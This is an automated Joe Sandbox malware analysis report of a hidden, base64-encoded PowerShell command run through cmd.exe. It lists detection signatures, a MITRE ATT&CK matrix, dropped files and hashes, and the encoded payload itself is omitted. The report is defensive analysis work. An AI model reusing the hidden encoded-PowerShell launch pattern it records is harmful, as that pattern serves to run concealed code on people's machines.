ID: 431253
Cookbook: defaultwindowscmdlinecookbook.jbs
Time: 15:50:42
Date: 08/06/2021
Version: 32.0.0 Black Diamond

Table of Contents

Table of Contents 2
Analysis Report 3
  Overview 3
    General Information 3
    Detection 3
    Signatures 3
    Classification 3
  Process Tree 3
  Malware Configuration 3
  Yara Overview 3
  Sigma Overview 4
    System Summary: 4
  Signature Overview 4
    System Summary: 4
    Data Obfuscation: 4
    HIPS / PFW / Protection Evasion: 4
  Mitre Att&ck Matrix 4
  Behavior Graph 4
  Screenshots 5
    Thumbnails 5
  Antivirus, Machine Learning and Genetic Malware Detection 6
    Initial Sample 6
    Dropped Files 6
    Unpacked PE Files 6
    Domains 6
    URLs 6
  Domains and IPs 7
    Contacted Domains 7
    URLs from Memory and Binaries 7
    Contacted IPs 7
  General Information 7
  Simulations 7
    Behavior and APIs 7
  Joe Sandbox View / Context 8
    IPs 8
    Domains 8
    ASN 8
    JA3 Fingerprints 8
    Dropped Files 8
  Created / dropped Files 8
  Static File Info 9
    No static file info 9
  Network Behavior 9
  Code Manipulations 9
  Statistics 10
  Behavior 10
    System Behavior 10
      Analysis Process: cmd.exe PID: 6912 Parent PID: 4972 10
        General 10
        File Activities 10
      Analysis Process: conhost.exe PID: 6920 Parent PID: 6912 10
        General 10
      Analysis Process: powershell.exe PID: 6964 Parent PID: 6912 11
        General 11
        File Activities 11
          File Created 11
          File Deleted 11
          File Written 11
          File Read 11
  Disassembly 11
    Code Analysis 11

Copyright Joe Security LLC 2021 Page 2 of 11

Analysis Report

Overview

General Information

Analysis ID: 431253
Most interesting Screenshot:
Infos:

Detection

Score: 52
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Encrypted powershell cmdline option…
Sigma detected: Suspicious PowerS…
Suspicious powershell command line…
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mo…
Enables debug privileges
Found a high number of Window / Us…
May sleep (evasive loops) to hinder…
Queries the volume information (nam…
Sigma detected: Non Interactive Pow…
Very long cmdline option found, this…

Classification

Radar chart axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware
Scale: malicious, suspicious, clean

Process Tree

System is w10x64

cmd.exe (PID: 6912, cmdline: cmd /C ''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En '[base64 -EncodedCommand payload omitted]'', MD5: F3BDBE3BB6F734E357235F4D5898582D)
  conhost.exe (PID: 6920, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  powershell.exe (PID: 6964, cmdline: 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En '[base64 -EncodedCommand payload omitted]', MD5: DBA3E6449E97D4E3DF64527EF7012A10)
cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: Non Interactive PowerShell

Signature Overview


System Summary:

Data Obfuscation:

Suspicious powershell command line found

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Command and Scripting Interpreter 1; PowerShell 2; At (Linux); At (Windows); Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection 1 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 2 1; Process Injection 1 1; Deobfuscate/Decode Files or Information 1; Software Packing
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery 1; Process Discovery 1; Virtualization/Sandbox Evasion 2 1; Application Window Discovery 1; System Information Discovery 1 1
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Data Obfuscation; Junk Data; Steganography; Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication

Behavior Graph

Behavior graph rendered as an image; recoverable content: ID: 431253, Cookbook: defaultwindowscmdlinecookbook.jbs, Startdate: 08/06/2021, Architecture: WINDOWS, Score: 52. Nodes: cmd.exe started powershell.exe and conhost.exe. Signatures shown on the graph: Sigma detected: Suspicious PowerShell Parameter Substring; Suspicious powershell command line found; Encrypted powershell cmdline option found.

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
crl.microsoftYk | 0% | Avira URL Cloud | safe |
www..co | 0% | URL Reputation | safe |
www.microsoft.co | 0% | URL Reputation | safe |
www.microsoft.co | 0% | URL Reputation | safe |
www.microsoft.co | 0% | URL Reputation | safe |

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 431253
Start date: 08.06.2021
Start time: 15:50:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 35s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: defaultwindowscmdlinecookbook.jbs
Analysis system description: 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal52.evad.win@4/4@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI

Simulations

Behavior and APIs

Time | Type | Description
15:51:58 | API Interceptor | 34x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8003
Entropy (8bit): 4.839308921501875
Encrypted: false
SSDEEP: 192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
MD5: 937C6E940577634844311E349BD4614D
SHA1: 379440E933201CD3E6E6BF9B0E61B7663693195F
SHA-256: 30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
SHA-512: 6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE...... <.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1...... Uninstall-Module...... inmo...... fimo...... Install-Module...... New-ScriptFileInfo...... Publish-Module...... Install-Script...... Update-Script...... Find-Command...... Update-ModuleManifest...... Find-DscResource...... Save-Module...... Save-Script...... upmo...... Uninstall-Script...... Get-InstalledScript...... Update-Module...... Register-PSRepository...... Find-Script...... Unregister-PSRepository...... pumo...... Test-ScriptFileInfo...... Update-ScriptFileInfo...... Set-PSRepository...... Get-PSRepository...... Get-InstalledModule...... Find-Module...... Find-RoleCapability...... Publish-Script...... <.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*...... Install-Script...... Save-Module...... Publish-Module...... Find-Module...... Download-Package...... Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjbny5jd.jng.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duyhhnd0.owp.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

C:\Users\user\Documents\20210608\PowerShell_transcript.899552.6vnRxYnU.20210608155136.txt
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 1265586
Entropy (8bit): 5.548539921381928
Encrypted: false
SSDEEP: 768:U7BHHhhdZiD6hhmSZizzpfgps333tttttXXX4pppps////AFFFkPPPppppxdddW5:BtJtJtJg
MD5: 6D1B4D23796EA024669054A65493E862
SHA1: 6C8F7B14E03EAFDA4E2EB3D176B17A39058474B6
SHA-256: C99F4F477BAD1FF858AF3BFC5EF2791F7E3F39A7752F8B3C6B8EF8FB1BC70FB2
SHA-512: 952F9F0D7579AB55238864C742263FD93610C264E759A646E9060A7346F97628D4DC18C6F8CD9736E7DDF7570647DE2349B48AEDCC69443ED991067B8DB24923
Malicious: false
Reputation: low
Preview: .**********************..Windows PowerShell transcript start..Start time: 20210608155148..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 899552 ( NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -En [base64 -EncodedCommand payload omitted]

Static File Info

No static file info

Network Behavior

No network behavior found

Code Manipulations

Statistics

Behavior


System Behavior

Analysis Process: cmd.exe PID: 6912 Parent PID: 4972

General

Start time: 15:51:34
Start date: 08/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /C ''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En '[base64 -EncodedCommand payload omitted]''
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Analysis Process: conhost.exe PID: 6920 Parent PID: 6912

General

Start time: 15:51:34
Start date: 08/06/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: powershell.exe PID: 6964 Parent PID: 6912

General

Start time: 15:51:35
Start date: 08/06/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden -En '[base64 -EncodedCommand payload omitted]'
Imagebase: 0xd30000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

File Activities

File Created

File Deleted

File Written

File Read

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond
